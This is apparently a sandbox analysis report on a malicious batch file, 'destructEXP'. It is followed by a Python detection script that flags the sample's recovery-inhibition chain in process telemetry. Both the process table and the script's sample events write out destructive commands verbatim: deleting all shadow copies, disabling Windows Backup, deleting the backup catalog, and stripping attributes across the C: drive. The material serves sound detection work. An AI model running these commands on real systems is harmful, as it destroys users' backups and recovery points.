Field | Value
---|---
File name | destructEXP.txt
Full analysis | https://app.any.run/tasks/2b5b74e2-b8a3-4eb8-8e27-56c86a7fbaa7
Verdict | Malicious activity
Analysis date | December 05, 2022, 20:56:20
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators | —
MIME | text/x-msdos-batch
File info | DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5 | 09B0299C777DEC3882E187E3E0B58FEF
SHA1 | D9AEEDB1FC1985609326300F7EDB17AA6A4ABABF
SHA256 | 535DEBF2E733A9E50DD0604E9795DC8206F2F6EE74326C13F0C756053E25DFC6
SSDEEP | 48:gFSeJFSecJfWEVBfcIBxDp+w+9UretOQTtGSQySxHQD8cFP:g7SLRJvDptiUretOQTtGSQySxHQD8cFP
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
1328 | "C:\Windows\system32\NOTEPAD.EXE" "C:\Users\admin\Desktop\destructEXP.txt" | C:\Windows\system32\NOTEPAD.EXE | — | Explorer.EXE
User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Notepad | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3048 | "C:\Windows\System32\cmd.exe" /C "C:\Users\admin\Desktop\destructEXP.bat" | C:\Windows\System32\cmd.exe | — | Explorer.EXE
User: admin | Company: Microsoft Corporation | Integrity Level: HIGH | Description: Windows Command Processor | Exit code: 1 | Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3304 | ATTRIB -R -A -S -H -O -I -X -V -P -U -B C:\ /S /D | C:\Windows\system32\attrib.exe | — | cmd.exe
User: admin | Company: Microsoft Corporation | Integrity Level: HIGH | Description: Attribute Utility | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3608 | ATTRIB -R -A -S -H -O -I -X -V -P -U -B C:\ /S /D /L | C:\Windows\system32\attrib.exe | — | cmd.exe
User: admin | Company: Microsoft Corporation | Integrity Level: HIGH | Description: Attribute Utility | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3496 | WBADMIN DISABLE BACKUP -quiet | C:\Windows\system32\wbadmin.exe | — | cmd.exe
User: admin | Company: Microsoft Corporation | Integrity Level: HIGH | Description: Command Line Interface for Microsoft® BLB Backup | Exit code: 4294967293 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3744 | VSSADMIN DELETE SHADOWS /all /quiet | C:\Windows\system32\vssadmin.exe | — | cmd.exe
User: admin | Company: Microsoft Corporation | Integrity Level: HIGH | Description: Command Line Interface for Microsoft® Volume Shadow Copy Service | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
4072 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe
User: SYSTEM | Company: Microsoft Corporation | Integrity Level: SYSTEM | Description: Microsoft® Volume Shadow Copy Service | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2512 | WBADMIN DELETE CATALOG -quiet | C:\Windows\system32\wbadmin.exe | — | cmd.exe
User: admin | Company: Microsoft Corporation | Integrity Level: HIGH | Description: Command Line Interface for Microsoft® BLB Backup | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
752 | "C:\Windows\system32\wbengine.exe" | C:\Windows\system32\wbengine.exe | — | services.exe
User: SYSTEM | Company: Microsoft Corporation | Integrity Level: SYSTEM | Description: Microsoft® Block Level Backup Engine Service EXE | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1920 | C:\Windows\System32\vdsldr.exe -Embedding | C:\Windows\System32\vdsldr.exe | — | svchost.exe
User: SYSTEM | Company: Microsoft Corporation | Integrity Level: SYSTEM | Description: Virtual Disk Service Loader | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
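The process tree above is the preparation sequence a ransomware-style destructor runs before it encrypts or wipes: strip attributes from every file on the drive, disable Windows Backup, delete all volume shadow copies, then delete the backup catalog, all launched from a HIGH-integrity cmd.exe so the privileged vssadmin and wbadmin calls succeed. The Python below is an added example, not part of the ANY.RUN report, showing the detection logic a SOC would run over process-creation telemetry to flag this chain. The field names (Image, CommandLine, ParentProcessId, IntegrityLevel) follow Sysmon Event ID 1 and are an assumption; the sample events are constructed from the table above (Explorer's PID is not in the report, so a placeholder is used); the T1490 mapping for the vssadmin and wbadmin commands is MITRE ATT&CK's Inhibit System Recovery.

```python
"""Flag the backup- and shadow-copy-tampering commands from the process tree
above in process-creation telemetry. Field names follow Sysmon Event ID 1
(Image, CommandLine, ParentProcessId, IntegrityLevel); that schema and the
sample events below are assumptions, not data from the ANY.RUN report."""
import re
from collections import defaultdict
from dataclasses import dataclass

DRIVE_ROOT = re.compile(r"^[a-z]:\\?$", re.IGNORECASE)  # "C:" or "C:\"


def split_cmdline(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, honouring double quotes.
    Backslashes are path separators, not escapes, so POSIX shlex is the wrong tool."""
    tokens, cur, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def image_name(path: str) -> str:
    """Basename of an image path, lower-cased (NTFS paths are case-insensitive)."""
    return path.rsplit("\\", 1)[-1].lower()


def has_phrase(args: list[str], *phrase: str) -> bool:
    """True if `phrase` occurs as consecutive arguments (args already lower-cased)."""
    n = len(phrase)
    return any(tuple(args[i:i + n]) == phrase for i in range(len(args) - n + 1))


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    technique: str   # MITRE ATT&CK ID, or "" where none is asserted
    elevated: bool   # these commands only succeed with admin rights


def check_event(ev: dict) -> list[Finding]:
    img = image_name(ev["Image"])
    args = [t.lower() for t in split_cmdline(ev["CommandLine"])[1:]]
    elevated = ev.get("IntegrityLevel", "").lower() in ("high", "system")

    def hit(rule: str, tech: str) -> Finding:
        return Finding(ev["ProcessId"], rule, tech, elevated)

    out = []
    if img == "vssadmin.exe" and has_phrase(args, "delete", "shadows"):
        out.append(hit("vssadmin delete shadows", "T1490"))
    if img == "wbadmin.exe" and has_phrase(args, "delete", "catalog"):
        out.append(hit("wbadmin delete catalog", "T1490"))
    if img == "wbadmin.exe" and has_phrase(args, "disable", "backup"):
        out.append(hit("wbadmin disable backup", "T1490"))
    if img == "attrib.exe":
        # Stripping system/hidden/read-only recursively from a drive root is
        # mass tampering, not normal attrib use on a single file.
        strips = {"-s", "-h", "-r"} & set(args)
        if strips and "/s" in args and any(DRIVE_ROOT.match(a) for a in args):
            out.append(hit("attrib strips attributes across a drive root", ""))
    return out


def correlate(events: list[dict]) -> dict[int, list[Finding]]:
    """Group findings by spawning parent; two or more distinct T1490 rules under
    one parent is the inhibit-system-recovery chain seen in the report."""
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev["ParentProcessId"]].extend(check_event(ev))
    return {p: fs for p, fs in by_parent.items()
            if len({f.rule for f in fs if f.technique == "T1490"}) >= 2}


def _ev(pid, ppid, image, cmdline, parent_image, integrity):
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image,
            "CommandLine": cmdline, "ParentImage": parent_image, "IntegrityLevel": integrity}


SYS32 = r"C:\Windows\system32"
# Constructed from the process table above; PPID 0 is a placeholder for
# Explorer.EXE, whose PID the report does not list.
SAMPLE_EVENTS = [
    _ev(3048, 0, SYS32 + r"\cmd.exe", r'"C:\Windows\System32\cmd.exe" /C "C:\Users\admin\Desktop\destructEXP.bat"', r"C:\Windows\Explorer.EXE", "High"),
    _ev(3304, 3048, SYS32 + r"\attrib.exe", r"ATTRIB -R -A -S -H -O -I -X -V -P -U -B C:\ /S /D", SYS32 + r"\cmd.exe", "High"),
    _ev(3496, 3048, SYS32 + r"\wbadmin.exe", "WBADMIN DISABLE BACKUP -quiet", SYS32 + r"\cmd.exe", "High"),
    _ev(3744, 3048, SYS32 + r"\vssadmin.exe", "VSSADMIN DELETE SHADOWS /all /quiet", SYS32 + r"\cmd.exe", "High"),
    _ev(2512, 3048, SYS32 + r"\wbadmin.exe", "WBADMIN DELETE CATALOG -quiet", SYS32 + r"\cmd.exe", "High"),
    # Constructed benign control: an operator listing shadow copies must not fire.
    _ev(4100, 4000, SYS32 + r"\vssadmin.exe", "vssadmin list shadows", SYS32 + r"\cmd.exe", "High"),
]

if __name__ == "__main__":
    for parent, findings in correlate(SAMPLE_EVENTS).items():
        print(f"parent PID {parent}: inhibit-system-recovery chain")
        for f in findings:
            print(f"  PID {f.pid:<5} {f.technique or '-':<6} elevated={f.elevated} {f.rule}")
```

The constructed `vssadmin list shadows` event is there so the rule keys on the destructive verb rather than on the binary name; vssadmin and wbadmin are legitimate administration tools. Two caveats come straight from the trace: the `-quiet` and `/quiet` switches suppress confirmation prompts and are a useful secondary signal but should not be required for a match, and `WBADMIN DISABLE BACKUP` exited with a non-zero code (4294967293) while the shadow and catalog deletions exited 0, so detection has to fire on the attempt, not on its success.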
PID | Process | Filename | Type
---|---|---|---
3508 | SearchIndexer.exe | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\tmp.edb | —
MD5: — | SHA256: —
956 | wbadmin.exe | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | etl
MD5: EC4861D04D18CCDFFDC7DE8CA8486422 | SHA256: 1ED86DFCD7FD66791D8F0B3A6811A50D240FA2CA84C58C0D98EFE1A7076DD3CA
956 | wbadmin.exe | C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl | etl
MD5: BAE3F2801589B51E51C678A2BA3D144F | SHA256: 56F896A015CBA496AF98465F5DA0D64DAFFB50FFCBEDEAFD671E905B0006FA71
956 | wbadmin.exe | C:\Windows\Logs\WindowsBackup\Wbadmin.0.etl | etl
MD5: EC4861D04D18CCDFFDC7DE8CA8486422 | SHA256: 1ED86DFCD7FD66791D8F0B3A6811A50D240FA2CA84C58C0D98EFE1A7076DD3CA
3036 | wbadmin.exe | C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl | etl
MD5: BAE3F2801589B51E51C678A2BA3D144F | SHA256: 56F896A015CBA496AF98465F5DA0D64DAFFB50FFCBEDEAFD671E905B0006FA71
3508 | SearchIndexer.exe | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.chk | binary
MD5: 89331BF3F8EFB7B447CD51DE3FC6A50E | SHA256: EC95584EE9A16B1BBEA560BC386C4BD326AF520AE67CBB22018FBEBDEB14D6AD
1328 | NOTEPAD.EXE | C:\Users\admin\Desktop\destructEXP.txt | text
MD5: 09B0299C777DEC3882E187E3E0B58FEF | SHA256: 535DEBF2E733A9E50DD0604E9795DC8206F2F6EE74326C13F0C756053E25DFC6
3496 | wbadmin.exe | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | etl
MD5: BAE3F2801589B51E51C678A2BA3D144F | SHA256: 56F896A015CBA496AF98465F5DA0D64DAFFB50FFCBEDEAFD671E905B0006FA71
3496 | wbadmin.exe | C:\Windows\Logs\WindowsBackup\Wbadmin.0.etl | etl
MD5: BAE3F2801589B51E51C678A2BA3D144F | SHA256: 56F896A015CBA496AF98465F5DA0D64DAFFB50FFCBEDEAFD671E905B0006FA71
3036 | wbadmin.exe | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | etl
MD5: C2FD499C8E819352A89AFBEE98FB8F25 | SHA256: EACCC640C5BD96E541817E963AE2DB841D66C879F3D5F925FC5887F9E7742E8D